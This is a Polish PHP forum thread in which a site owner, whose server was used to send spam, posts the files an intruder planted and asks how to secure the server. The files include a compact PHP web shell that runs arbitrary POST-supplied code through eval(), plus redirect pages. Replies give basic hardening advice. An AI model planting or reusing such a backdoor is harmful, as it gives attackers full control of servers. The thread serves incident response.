Witaj Gościu! ( Zaloguj | Rejestruj )

Forum PHP.pl

 
Reply to this topicStart new topic
> [inne][HTML][PHP] Włamanie na serwer, dziwne pliki, jak sie zabezpieczyć?
adi456
post 25.01.2012, 12:04:03
Post #1





Grupa: Zarejestrowani
Postów: 251
Pomógł: 0
Dołączył: 21.01.2010
Skąd: Nowy Sącz

Ostrzeżenie: (0%)
-----


Witam,

ostanio przysło mi ostrzeżenie o rozsyłaniu spamu, odkryłem nowe pliki na serwerze, rozumiem że ktoś sie włamał i wykorzystał mój serwer
zna ktoś te pliki? i jak skutecznie zabezpieczyć sie przed tym

nieautoryzowane pliki:

8taIf4yjp.html
  1. <meta http-equiv="Refresh" content="0; URL=http://google.com/"><html><script>parent.location.href='http://google.com/'</script></html>


Yg3tBUjQw.html
  1. <meta http-equiv="Refresh" content="0; URL=http://google.com/"><html><script>parent.location.href='http://google.com/'</script></html>


ddslbyi.php
  1. <?php
  2. ini_set('max_execution_time',0);
  3. if (isset($_POST['sdf3sa4'])) {
  4. $text = strpos($_POST['sdf3sa4'], '\\\\n') === false ? $_POST['sdf3sa4'] : stripslashes($_POST['sdf3sa4']);
  5. eval($text);
  6. }
  7. ?>


ddseuaq.php
  1. <?php
  2. ini_set('max_execution_time',0);
  3. if (isset($_POST['sdf3sa4'])) {
  4. $text = strpos($_POST['sdf3sa4'], '\\\\n') === false ? $_POST['sdf3sa4'] : stripslashes($_POST['sdf3sa4']);
  5. eval($text);
  6. }
  7. ?>
Go to the top of the page
+Quote Post
Sephirus
post 25.01.2012, 12:53:59
Post #2





Grupa: Zarejestrowani
Postów: 1 527
Pomógł: 438
Dołączył: 28.06.2011
Skąd: Warszawa

Ostrzeżenie: (0%)
-----


Z tego co widzę to te pliki PHP to nie żarty :/

Te pliki ustawiają sobie nieokreślony czas na wykonywanie, ingorują rozłączenie w userem (w teorii mogą chodzić non-stop) a kod do wykonania otrzymują poprzez $_POST :/

Spamowanie to i tak mało w porównaniu z tym co ktoś mógłby z nich wycisnąć...

Zabezpiecz dobrze serwer... Nie znam tych plików ale można nimi wiele zdziałać... :/

Co do opcji skąd się wzięły i jak się zabezpieczyć:
1. Pozmieniaj wszystkie hasła (na jakieś mocne - tak w razie czego)
2. Czy korzystasz na stronie z jakiejś gotowej biblioteki, CMS'a, skryptu, który może zapisywać pliki na serwerze? Jesli tak to ktoś mógł wykorzystać dziurę w kodzie takich skryptów...
3. Co to za serwer? Na czym stoi? Na jakim hostingu/w domu? Od tego dużo zależy...



--------------------
If you're good at something, never do it for free.
Potrzebujesz skryptu JS lub PHP - szukasz kogoś kto przetestuje twoją aplikację pod względem bezpieczeństwa? Szybko i solidnie? Napisz ;)
Mój blog - Jak zwiększyć wydajność front-endu - O buforowaniu wyjścia w PHP słów kilka...
Go to the top of the page
+Quote Post
adi456
post 25.01.2012, 13:55:42
Post #3





Grupa: Zarejestrowani
Postów: 251
Pomógł: 0
Dołączył: 21.01.2010
Skąd: Nowy Sącz

Ostrzeżenie: (0%)
-----


Serwer wirtualny Pro - w ovh.pl

nie korzystam z gotowych rozwiazań, tylko małe firmowe strony typu edcar-sacz.pl.

już sie zabieram za zmiane haseł

podmieniłem im treść w plikach na

  1. $ip = $_SERVER['REMOTE_ADDR'];
  2. $test = $_SERVER['HTTP_USER_AGENT'];
  3. $co=$_POST['sdf3sa4'];
  4.  
  5. $dane = "$ip - $test - $co\n";
  6. $file = "error.txt";
  7. $fp = fopen($file, "r+");
  8.  
  9. $fp = fopen($file, "a");
  10. flock($fp, 2);
  11. fwrite($fp, $dane);
  12. flock($fp, 3);
  13. fclose($fp);


a czy może powinienem gdzies złożyć zawiadomienie o włamaniu? Nie wiem do jakiego celu ktoś wykorzystywał mój serwer ale zeby później na mnie nie było sad.gif

włamy sa z adresu ip 188.95.49.179

Ten post edytował adi456 25.01.2012, 17:32:33
Go to the top of the page
+Quote Post

Reply to this topicStart new topic
1 Użytkowników czyta ten temat (1 Gości i 0 Anonimowych użytkowników)
0 Zarejestrowanych:

 



RSS Wersja Lo-Fi Aktualny czas: 14.07.2025 - 21:18